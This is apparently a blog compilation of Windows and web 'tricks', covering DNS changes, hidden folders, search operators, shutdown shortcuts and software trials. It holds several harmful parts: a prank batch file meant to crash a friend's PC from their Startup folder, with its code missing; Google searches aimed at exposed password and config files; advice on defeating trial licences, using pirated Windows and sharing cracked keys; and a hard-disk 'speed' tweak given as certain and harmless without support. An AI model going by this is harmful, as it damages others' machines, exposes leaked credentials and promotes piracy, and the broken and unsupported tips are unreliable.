Speed up BSNL Broadband Internet Connection
To overcome slow BSNL DNS problem, we will use high speed DNS servers from OpenDNS. OpenDNS is third party DNS Server used to speed up BSNL Broadband internet connection

Steps to speed up BSNL Broadband Internet :
1. Open Control Panel -> Networking and Sharing Center -> Manage Network Connection.
2. Now a window showing all networks will be opened. Select BSNL Connection -> Right click -> Properties.
3. Now, double click on Internet Protocol Version(TCP/IPv4) and in newly opened window at bottom, select “Use the following DNS Server address”
4. And fill these 2 DNS Addresses in two fields:
208.67.222.222
208.67.220.220

and hit OK. Thats it. Your BSNL Internet Broadband DNS Servers changed.

HIDE FOLDERS IN WINDOWS

hide ur folders without the usage of folder lock :

suppose u want to hide a folder named "hello"which is in D: of ur computer

go to command prompt
start--->run--->cmd-->d:


after changing it from C: to D:

type D:/>attrib +h +s hello
the above command is to hide the folder

to show the folder

tyoe D:/>attrib -h -s abc

in this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)

INCREASE HARD DISK SPEED IN WINDOWS

If you like to increase/optimize your Hard Disk I/O - read/write speed without buying expensive software utilities to do that job or changing the HD, just follow next steps. With doing these steps you will increase Hard disk speed (depends of manufacture and specification, but its worth to try). The most speed improvement is visible with IDE drives; however there are reports that this tweak also does good for SCSI disks.

In any case, it won't harm your system, so try it yourself and let me know what you find!

Steps:

1. Run SYSEDIT.EXE from the start & then Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file untill you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type
5. Irq14=4096 (note: This line IS CASE SENSITIVE)
6. Click on the File menu, then choose Save.
7. Close SYSEDIT and reboot your computer.
8. Restart windows!

The speed improvement will be noticed just after the system reboots, any system info. software can be used to check the improvement.

This is a prank, which will make a command run over and over until the computer cannot handle any more programs and the computer will freeze or shutdown.

To make this open note pad and type:

The code above must be saved as a.bat and when the other person opens it nothing will appear but in the background it will keep opening its self until the computer freezes or shuts down.

You can try this on your friends by putting it in the Startup.

I tried this on my computer and it worked(obviosly didn't put it in my startup. I just ran it.)

Get most from GOOGLE search

Google Search Options

Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
Google allows you to search for specific file types, so instead of getting html-files as a result (websites) you get Microsoft excel files for example. The search string you would use would be this:

Filetype:xls (for excel files) or filetype:doc for word files.
But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way doesn’t tell you, you can search for *.db and *mdb files. I wonder what other file types one can search for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of something that might get you some interesting results.

Inurl

Another useful search option is the inurl: option which allows one to search for a certain word one would want to be in the url. This gives you the opportunity to search for specific directories/folders, especially in combination with the “index of” option. An example would be inurl:master-tricks which would give you results of website urls that have the word “master-tricks” in the url.

Index of

The index of option is another option that isn’t especially thought of by the creators of google, but comes in very handy. If you use the “index of” string you will find directory listings of specific folders on servers. An example could be: "index of” master-tricks or index.of.master-tricks which would get you many directory listings of master-tricks folders. (don’t forget to use the quotes in this case since you are looking for the entire “index of” string, not just for “index” and “of”)

Site

The site option allows you to come up with results that only belong to a certain domain name extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites, but also for results from just one site. An example of a search string would be: Site:org

Intitle

Intitle is another nice option. It allows you to search for html files that have a certain word or words in the title. The format would be intitle:wordhere.

Link

The Link option allows you to check which sites link to a specific site. For example link:http://pratikthorve.blogspot.com

Combining search options

The above mentioned search options might or might not be known to you, but even though they can amount to some interesting results, it’s a fact that when you start combining them, that’s when google’s magic starts to show. For example, one could try this search string: inurl:master-tricks intitle:master-tricks or this one: site:org filetype:xls "password" .

Speed up your Acrobat reader almost like notepad

Do u get irritated when acrobat reader takes 5 to10 seconds to load when you want to open a pdf file. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..

FASTEST SHUTDOWN METHOD

Imagine getting caught surfing restricted sites by parents.’Lucky’ ppl who have had this opportunity no how it feels.The most common approach is to close the site while you hear sum one coming or sum one near at hand,but what if u could shut down windows in the same amount of time ,or even better .In most PC s it takes around 10 seconds or more to completely shut down windows and in a bit older PCs it may cross the 20 second limit also but then I just now mentioned that u can shut down windows in the same time which it takes \to close an active internet window.. how? Try this …

Shut down windows in a matter of seconds. While shutting down window. open task manager(Ctr+Alt+Del), Select shut down tab. and press ' Ctrl ' key and select Turn Off from this tab. Within 2 seconds windows will shut down.

I have tested this method on various machines with a stop watch and believe me do u no what is the fastest timing a mere 1.35 seconds n with a bit of practice can wrap up the entire session in a cool 3 seconds

CHANGING PEN DRIVE BACKGROUND

I was quite impressed after seeing my frnds pen drive .
It was having a Wallpaper as Background of his Pen drive .
(When asked abt how to do that-
he passed my quest. by saying that his elder brother did that
& he don't know ! )

So finally decided to do a bit of research my self and found out that not only a pen drive’s background can be can be changed ,even the backgrounds of folders can be changed .For example , if u hav all songs by Bryan Adams in a folder named ‘Bryan Adams’ u can set a cool wallpaper of the singer as the background just as u apply a wall paper in ur desktop

To do this implement the following steps


copy paste the image in the folder you want the settings to apply to..
display all hidden files of the folder..if desktop.ini is there open it else create one from notepad ..

add the following code

TRAIL SOFTWARES

Scores of software are available on the net, be it video editing tools ,media converters photo editing tools etc.And most of then are free too but for a trial period say 30 days or 2 months after which the software must be purchased in order to use it .We download several such freebies and use it once or twice and then simply dump it …and suddenly after a couple of months when we again require them THE TRAIL PERIOD IS OVER!!!!
And the software is useless. if u uninstall and reinstall it even then it wont work unless u validate it by entering a licence key .Even if you manually delete the registry values then again reinstall the software’s wont work.
SO WHAT IS THE SOLUTION???

Here it goes just double click ur clock in windows(which shows the time) Change the time to the period wen the software was active say if the software expired 2 weeks ago change the date to 3 weeks ago .click on apply …n now run the software n WHEW it works ..after using the software to ur hearts content once again change ur time n date to the normal. Simple it works for most software’s barring a few . I hav tried using this technique with Nero in Windows XP home Edition with service pack 2(ofcorse a pirated one) and it just works fine !!!!!!

BUT HERE COMES THE ULTIMATE SOLUTION

Now a days no one uses trail software’s .Keys of almost all software’s are so widely available in the net that there is no need to use trail software’s ..if u download any software using a torrent u will definetely get a Cd key with it. Just google it u will find many more .N i also follow a golden rule .NEVER SPEND EVEN A PAISE ON SOFTWARE ..when u can get it free…I hav keys of many security suites,media softwares,nero,adobe etc etc..it u need any just email me :

GIVE IT A TRY I BET U CAN'T

Everyday we create ,name n rename hundreds of files n folders .Have we ever spared a thought about file names ? No most probably not ..in Windows 7 era we can give long file names even exceeding 200 characters.But this was not always the case earlier in the DOS age file names could have a maximum length of 8 characters .Still today in Dos based applications like ‘C’ file names cannot be more than 8 characters long .And how does DOS display the long file names created in Windows ..simply by reducing the length to 8 characters n replacing the missing characters by ‘~’ .Now to all those readers who have reached so far I wont disappoint u, Just try this

Create any folder ,file ,shortcut n name it as ‘CON’ try it an tell me if it works or not

AUTO SHUTDOWN

Many down loaders have wished that there was some auto shutdown control in windows by which they could shut down their PCs after a specific interval of time .Many people have night unlimited download scheme where download is free from 2 -8 AM at night .You can start the download at 2 but how to stop it n shut down ur Pc before 8 ? you cannot perform this operation using task scheduler. Mind you the power options present are not very accurate .You cant specify that exactly afterr 5 hrs and 11 minutes or so the pc will shut down and it is reliable neither. so here comes the solution:



no need of software Just these few easy steps

1. go to desktop->right click->create new shortcut->type location as "%windir%\system32\shutdown.exe -s -t 100" (without quotes.)

2. click next

3. click finish

100 is for example. Note: if u want to shutdown ur pc u need to specify time in
seconds. Example: if one hour is required then in place of 100 u need to specify
3600 seconds. likewise u can give your timing. in short convert your time in
seconds and put it at 100(example). its very easy.After following the above
procedure you will see that an . exe file is created double click the exe file to start the countdown but problem is that after u start it u cant close or end it. for that go to run and type " shutdown -a" it will end the countdown.
